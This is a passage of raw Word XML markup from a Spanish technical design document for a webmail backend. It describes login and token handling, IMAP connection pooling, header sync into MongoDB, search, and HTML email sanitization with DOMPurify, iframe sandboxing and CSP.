        <w:t xml:space="preserve">ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(variable de entorno del servidor). El plugin mongoose-aes-encryption proporciona esta encriptación transparente a nivel de campo: la aplicación lee y escribe valores en texto plano mientras solo el ciphertext toca la base de datos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El documento resultante se almacena en la colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Emisión de tokens JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Se genera un access token (JWT firmado, expiración 15 minutos) y un refresh token (UUID aleatorio, expiración 7 días). El access token se devuelve en el cuerpo de la respuesta para almacenamiento en memoria del frontend; el refresh token se almacena en Redis con TTL de 7 días y se entrega al cliente como cookie HTTP-only con atributos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SameSite=Strict</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[157]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pool de conexiones IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Tras el login exitoso, el IMAP Manager inicializa una conexión persistente al servidor IMAP y la registra en un pool singleton por cuenta de usuario. El pool gestiona reconexiones automáticas, mailbox locking para acceso concurrente seguro, y expiración de conexiones inactivas tras 5 minutos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[137]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. imapflow maneja automáticamente extensiones IMAP como CONDSTORE, QRESYNC, IDLE y COMPRESS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[1]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sincronización inicial en background</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Se encola un job en BullMQ para sincronización de folders y headers. El usuario puede navegar inmediatamente mientras el worker procesa la sincronización en segundo plano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[203]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1863"/>
        <w:gridCol w:w="3727"/>
        <w:gridCol w:w="2329"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Componente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Decisión Arquitectónica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Validación de credenciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conexión transitoria IMAP en login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Elimina sincronización de passwords; garantiza acceso activo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encriptación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AES-256-GCM a nivel de campo vía mongoose-aes-encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Protege PII incluso si la base de datos se compromete</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[154]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Access token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT en memoria frontend, TTL 15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Minimiza superficie de ataque XSS; no se almacena en localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Refresh token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UUID en Redis + HTTP-only cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prevención de token theft; rotación en cada uso</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[157]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pool IMAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Singleton con expiración 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Evita límites de conexiones de providers (Gmail: 250, Outlook: 20)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[137]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="X9aaf23103ddea5209648da9c432b89a86994a82"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.2 Sincronización Inicial: FETCH Headers → Indexado en MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La sincronización inicial constituye el momento de mayor carga del sistema y define la primera impresión del usuario sobre la velocidad del webmail. El pipeline opera en cuatro fases:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Descubrimiento de folders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El worker de BullMQ ejecuta LIST contra el servidor IMAP para obtener la jerarquía completa de carpetas. Se almacenan en la colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">folders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con sus atributos (\HasNoChildren, \Sent, \Trash, etc.) y el uidvalidity actual.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fetch de headers en batch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Para cada folder, se ejecuta UID FETCH con BODY.PEEK[HEADER.FIELDS (DATE FROM TO CC SUBJECT MESSAGE-ID IN-REPLY-TO REFERENCES CONTENT-TYPE X-PRIORITY)] en lotes de 500 mensajes. Esta selección de headers es suficiente para construir la lista de emails, identificar threading y extraer preview, sin incurrir en el costo de transferir cuerpos completos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Parseo MIME y enriquecimiento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Cada lote de headers se procesa con PostalMime para extraer: remitente parseado (nombre + dirección), lista de destinatarios, asunto decodificado (RFC 2047), preview de texto (primeros 200 caracteres del body plain cuando está disponible), y flags IMAP. PostalMime — desarrollado por el mismo equipo de imapflow — ofrece protecciones de seguridad integradas como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxNestingDepth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">maxHeadersSize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, además de cero dependencias y soporte TypeScript nativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[99]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Indexado en MongoDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Los documentos se insertan en la colección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un índice compuesto siguiendo la regla ESR (Equality → Sort → Range):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{accountId: 1, folderId: 1, date: -1, uid: 1}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[204]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Este índice optimiza la query más frecuente del sistema: listar emails de una carpeta ordenados por fecha. Para servidores que soportan CONDSTORE, se almacena además el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">modseq</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de cada mensaje, permitiendo sincronizaciones incrementales subsiguientes que solo descargan mensajes modificados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[39]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El uso de BullMQ para orquestar este pipeline permite: retries con exponential backoff ante fallos transitorios de red, dead letter queues para mensajes que no pueden parsearse, y flow producers para modelar dependencias entre pasos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[203]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="X0b7cee9d2b92fc5403a2063366125c74fe9fafc"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.3 Navegación: Sirve desde MongoDB → Fallback a IMAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez completada la sincronización inicial, la navegación por el inbox opera casi exclusivamente contra MongoDB. El flujo es:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Query a MongoDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El endpoint GET /api/emails recibe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">accountId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">folderId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(default: date desc) y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(búsqueda opcional). Se ejecuta una query con el índice compuesto que resuelve en menos de 50ms para buzones de hasta 100,000 mensajes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Búsqueda full-text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Cuando el usuario introduce términos de búsqueda, MongoDB Atlas Search (basado en Apache Lucene) proporciona full-text search integrado sin infraestructura adicional, con sincronización automática de datos, highlighting, fuzzy search y autocomplete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Atlas Search cubre aproximadamente el 90% de los casos de uso de búsqueda en webmail: full-text sobre asunto, cuerpo, remitente, filtrado por fecha/carpeta y autocomplete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[132]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fallback a IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Si un folder no ha sido sincronizado (primer acceso) o la marca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">needsResync</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">está activa, el sistema delega la query a imapflow con un timeout de 10 segundos. Los resultados se cachean en MongoDB para consultas subsiguientes. Este fallback garantiza que el usuario siempre vea datos, aunque con mayor latencia en el primer acceso a una carpeta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Virtual scrolling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El frontend implementa virtual scrolling sobre la lista de emails, solicitando nuevas páginas vía paginación cursor-based (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lastDate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lastId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) en lugar de offset-based, evitando degradación de performance en páginas profundas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[148]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67" w:name="X0b0386711dfd3b250bf772a373eb3533ee57132"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2.4 Lectura de Email: Trae Body de IMAP → Sanitiza HTML → Marca \Seen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El flujo de lectura de un email individual ilustra el patrón</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">body-on-demand</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Comprobación de cache</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Al hacer clic en un email, el frontend solicita GET /api/emails/:id/body. El backend primero consulta Redis (patrón cache-aside): si el cuerpo está cacheado con TTL de 1 hora, se devuelve inmediatamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[152]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fetch del cuerpo vía IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: En cache miss, se ejecuta UID FETCH con BODY.PEEK[] para obtener el mensaje completo en formato RFC 822. El uso de BODY.PEEK evita marcar el mensaje como \Seen automáticamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[78]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El mensaje se parsea con PostalMime para extraer la parte HTML y la parte texto plano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[101]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sanitización de HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: La parte HTML se procesa con DOMPurify en el servidor (entorno jsdom) para eliminar scripts, event handlers inline, elementos potencialmente peligrosos (object, embed, form con action javascript:) y atributos de estilo que puedan ejecutar código (expression, behavior). DOMPurify es el gold standard para sanitización HTML, identificado como la única defensa confiable contra vectores XSS vía contenido de email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[154]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El HTML sanitizado se almacena en Redis con TTL de 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Marcado como leído</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Si el usuario permanece más de 3 segundos visualizando el email, el frontend envía una petición para marcar el mensaje como \Seen. Esta operación se ejecuta vía IMAP STORE y se refleja en MongoDB actualizando el campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flags</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Renderizado seguro en el cliente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: El HTML sanitizado se renderiza dentro de un iframe sandboxed con atributos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sandbox="allow-same-origin"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y una CSP estricta que bloquea scripts, plugins y navegación de top-level. Esta triple capa de sanitización (DOMPurify server-side + iframe sandbox + CSP headers) constituye la estrategia defense-in-depth contra ataques XSS vía email.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="68" w:name="Xe04f18782f3de255296f7f04431186ffdb4e1a7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
